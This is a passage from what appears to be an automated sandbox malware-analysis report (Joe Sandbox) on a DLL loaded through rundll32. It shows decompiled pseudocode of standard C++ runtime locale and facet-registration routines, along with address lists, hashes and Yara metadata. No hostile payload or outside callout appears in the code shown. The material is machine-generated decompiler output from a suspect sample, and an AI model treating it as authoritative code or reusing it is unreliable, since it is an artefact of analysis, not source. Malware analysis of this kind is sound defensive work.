																_t393 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6E2066BA(_t418 - 0x14);
																	return E6E220075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6E211471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t418 - 0x20);
																			E6E223D74(_t418 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t296, _t393, _t403, 0x14);
																			E6E206653(_t418 - 0x14, 0);
																			_t404 =  *0x6e2c6dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6E1E161C(0x6e2c6da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6E2066BA(_t418 - 0x14);
																				return E6E220075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6E2114EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t418 - 0x20);
																						E6E223D74(_t418 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t296, _t394, _t404, 0x14);
																						E6E206653(_t418 - 0x14, 0);
																						_t405 =  *0x6e2c6dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6E1E161C(0x6e2c6d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6E2066BA(_t418 - 0x14);
																							return E6E220075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6E211558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t418 - 0x20);
																									E6E223D74(_t418 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t296, _t395, _t405, 0x14);
																									E6E206653(_t418 - 0x14, 0);
																									_t406 =  *0x6e2c6e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6E1E161C(0x6e2c6dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6E2066BA(_t418 - 0x14);
																										return E6E220075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6E2115C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t418 - 0x20);
																												E6E223D74(_t418 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t296, _t396, _t406, 0x14);
																												E6E206653(_t418 - 0x14, 0);
																												_t407 =  *0x6e2c6dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6E1E161C(0x6e2c6d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6E2066BA(_t418 - 0x14);
																													return E6E220075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6E21162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6E1E1438(_t359);
																															E6E223D74(_t418 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e26851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6e26c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6E21542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6E220075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6E206FD3(__eflags, _t397);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6e2c6dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6E206FD3(__eflags, _t396);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6e2c6e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6E206FD3(__eflags, _t395);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6e2c6dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6E206FD3(__eflags, _t394);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6e2c6dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6E206FD3(__eflags, _t393);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6e2c6de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6E206FD3(__eflags, _t392);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6e2c6ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6E206FD3(__eflags, _t391);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6e2c6db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6E206FD3(__eflags, _t390);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6e2c6dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6E206FD3(__eflags, _t389);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6e2c6dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

































                          0x6e20f759
                          0x6e20f759
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78a
                          0x6e20f78f
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F760
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F76A
                          • int.LIBCPMT ref: 6E20F781
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F7A4
                          • std::_Facet_Register.LIBCPMT ref: 6E20F7BB
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F7DB
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F7F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID: xm,n
                          • API String ID: 113178234-1559963885
                          • Opcode ID: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
                          • Instruction ID: 8004293cadcf95e0c9dcf2b7f552294a58c66b67e777e9209cd1033daeb19f73
                          • Opcode Fuzzy Hash: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
                          • Instruction Fuzzy Hash: C211067A90051D9BCF01DBE0C898AEEB7BBAF44715F240908E410AB3D0DB749A44C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t770 - 0x14, 0);
				_t735 =  *0x6e2c6db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6E1E161C(0x6e2c6d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6E2066BA(_t770 - 0x14);
					return E6E220075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6E210F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t770 - 0x20);
							E6E223D74(_t770 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t717, _t735, 0x14);
							E6E206653(_t770 - 0x14, 0);
							_t736 =  *0x6e2c6dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6E1E161C(0x6e2c6d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6E2066BA(_t770 - 0x14);
								return E6E220075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6E210F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t770 - 0x20);
										E6E223D74(_t770 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t544, _t718, _t736, 0x14);
										E6E206653(_t770 - 0x14, 0);
										_t737 =  *0x6e2c6dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6E1E161C(0x6e2c6d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6E2066BA(_t770 - 0x14);
											return E6E220075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6E210FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t770 - 0x20);
													E6E223D74(_t770 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t544, _t719, _t737, 0x14);
													E6E206653(_t770 - 0x14, 0);
													_t738 =  *0x6e2c6df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6E1E161C(0x6e2c6d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6E2066BA(_t770 - 0x14);
														return E6E220075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6E211057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t770 - 0x20);
																E6E223D74(_t770 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t544, _t720, _t738, 0x14);
																E6E206653(_t770 - 0x14, 0);
																_t739 =  *0x6e2c6dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6E1E161C(0x6e2c6d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6E2066BA(_t770 - 0x14);
																	return E6E220075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6E2110BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t770 - 0x20);
																			E6E223D74(_t770 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t544, _t721, _t739, 0x14);
																			E6E206653(_t770 - 0x14, 0);
																			_t740 =  *0x6e2c6df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6E1E161C(0x6e2c6da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6E2066BA(_t770 - 0x14);
																				return E6E220075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6E211127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t770 - 0x20);
																						E6E223D74(_t770 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t544, _t722, _t740, 0x14);
																						E6E206653(_t770 - 0x14, 0);
																						_t741 =  *0x6e2c6df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6E1E161C(0x6e2c6da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6E2066BA(_t770 - 0x14);
																							return E6E220075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6E2111AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t770 - 0x20);
																									E6E223D74(_t770 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t544, _t723, _t741, 0x14);
																									E6E206653(_t770 - 0x14, 0);
																									_t742 =  *0x6e2c6dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6E1E161C(0x6e2c6d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6E2066BA(_t770 - 0x14);
																										return E6E220075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6E211230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t770 - 0x20);
																												E6E223D74(_t770 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t544, _t724, _t742, 0x14);
																												E6E206653(_t770 - 0x14, 0);
																												_t743 =  *0x6e2c6dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6E1E161C(0x6e2c6d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6E2066BA(_t770 - 0x14);
																													return E6E220075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6E2112B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t770 - 0x20);
																															E6E223D74(_t770 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t544, _t725, _t743, 0x14);
																															E6E206653(_t770 - 0x14, 0);
																															_t744 =  *0x6e2c6dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6E1E161C(0x6e2c6d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6E2066BA(_t770 - 0x14);
																																return E6E220075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6E211339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t770 - 0x20);
																																		E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t544, _t726, _t744, 0x14);
																																		E6E206653(_t770 - 0x14, 0);
																																		_t745 =  *0x6e2c6db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6E1E161C(0x6e2c6d64);
